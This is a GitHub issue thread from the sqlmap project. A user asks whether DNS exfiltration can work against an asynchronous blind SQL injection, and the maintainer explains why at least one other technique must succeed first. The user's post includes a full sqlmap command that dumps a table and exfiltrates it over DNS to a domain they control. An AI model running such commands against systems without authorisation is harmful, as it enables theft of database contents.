### ISSUE TITLE
DNS exfiltration in async SQL

### ISSUE THREAD

**Issue by achie27** [sqlmapproject/sqlmap#5125]
I'm trying to do a DNS exfiltration attack in an application in which the [vulnerable SQL query runs asynchronously](https://portswigger.net/web-security/sql-injection/blind#exploiting-blind-sql-injection-using-out-of-band-oast-techniques) and the other blind techniques don't work since the response isn't dependent on that query.

I can gather [from the wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage#dns-exfiltration-attack) that at least one blind SQL technique needs to work for this attack in sqlmap but is there A way to just blindly use `--dns-domain` without any of the other techniques working? Or are there any plans to support that type of usage in the future?

This is the command I'm using on my local setup btw -
```bash
sudo sqlmap -u VULN_DOMAIN --cookie VULN_COOKIE -p VULN_COOKIE_KEY --level=5 --risk=3 -v 3 --dump --threads=10 -T VULN_TABLE --dns-domain=DOMAIN_CONTROLLED_BY_ME --force-dns
```

Which ends with
```
[CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
```

**Comment by stamparm** [comment]
1) Sorry, but at least one SQLi technique needs to work (e.g. time-based blind). Main reason is because it is really burdensome to find out the proper working payload with the usage of DNS exfiltration queries, as there is lots of waiting that has to be done, while there are potentially thousands of payloads that have to be sent during the detection phase (....and users don't like waiting)
2) "Asynchronous" SQL queries do not sound promising for DNS exfiltration OR any other SQLi technique. sqlmap requires request and appropriate response, and not waiting for some effect in some asynchronous state
